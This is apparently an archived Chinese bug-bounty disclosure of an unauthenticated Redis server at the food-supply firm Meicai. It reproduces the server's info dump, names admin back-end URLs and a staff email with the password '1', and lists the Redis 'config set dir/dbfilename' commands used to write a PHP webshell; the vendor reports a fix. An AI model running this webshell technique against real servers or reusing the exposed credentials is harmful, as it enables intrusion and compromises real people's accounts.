漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:美菜配置不当-3(沦陷:商品+订单+仓储管理+采购+配送+门店 +微信帐号+供应商+数据统计+监控)
提交时间:2015-05-28 09:52
修复时间:2015-07-12 22:54
公开时间:2015-07-12 22:54
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-05-28: 细节已通知厂商并且等待厂商处理中 2015-05-28: 厂商已经确认,细节仅向厂商公开 2015-06-07: 细节向核心白帽子及相关领域专家公开 2015-06-17: 细节向普通白帽子公开 2015-06-27: 细节向实习白帽子公开 2015-07-12: 细节向公众公开
简要描述: ...
详细说明: 首先: 103.227.78.174 6379 Redis未授权访问:
103.227.78.174:0>info # Server redis_version:2.8.4 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux 3.13.0-40-generic x86_64 arch_bits:64 multiplexing_api:epoll gcc_version:4.8.2 process_id:28300 run_id:162ad9151062bf85375ffffe41fc2fc9d111c058 tcp_port:6379 uptime_in_seconds:7188735 uptime_in_days:83 hz:10 lru_clock:667450 config_file: # Clients connected_clients:43 client_longest_output_list:0 client_biggest_input_buf:0 blocked_clients:0 # Memory used_memory:15533496 used_memory_human:14.81M used_memory_rss:19869696 used_memory_peak:29648512 used_memory_peak_human:28.28M used_memory_lua:33792 mem_fragmentation_ratio:1.28 mem_allocator:jemalloc-3.4.1 # Persistence loading:0 rdb_changes_since_last_save:74 rdb_bgsave_in_progress:0 rdb_last_save_time:1432737156 rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec:0 rdb_current_bgsave_time_sec:-1 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok # Stats total_connections_received:9902 total_commands_processed:8795662 instantaneous_ops_per_sec:0 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:5470 evicted_keys:0 keyspace_hits:612311 keyspace_misses:6500171 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:594 # Replication role:master connected_slaves:0 master_repl_offset:0 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:896.06 used_cpu_user:1366.81 used_cpu_sys_children:79.05 used_cpu_user_children:480.75 # Keyspace db0:keys=195,expires=172,avg_ttl=1083509001 103.227.78.174:0>
里面存储了大量admin的账号密码 后台: http://stage.yunshanmeicai.com/ http://103.227.78.174:8080/
然后 解密 随机一个 zcy2@meicai.cn 密码居然是:1 大量密码都是1 无语
爆路径:http://103.227.78.174:4001/ 测试写shell: 103.227.78.174:0>config set dir /data/www/ OK 103.227.78.174:0>config set dbfilename redis.php OK 103.227.78.174:0>set webshell "<?php phpinfo(); ?>" OK 103.227.78.174:0>save OK 103.227.78.174:0> ok 就这样
漏洞证明: 修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:10
确认时间:2015-05-28 22:09
厂商回复: 已修复
最新状态: 暂无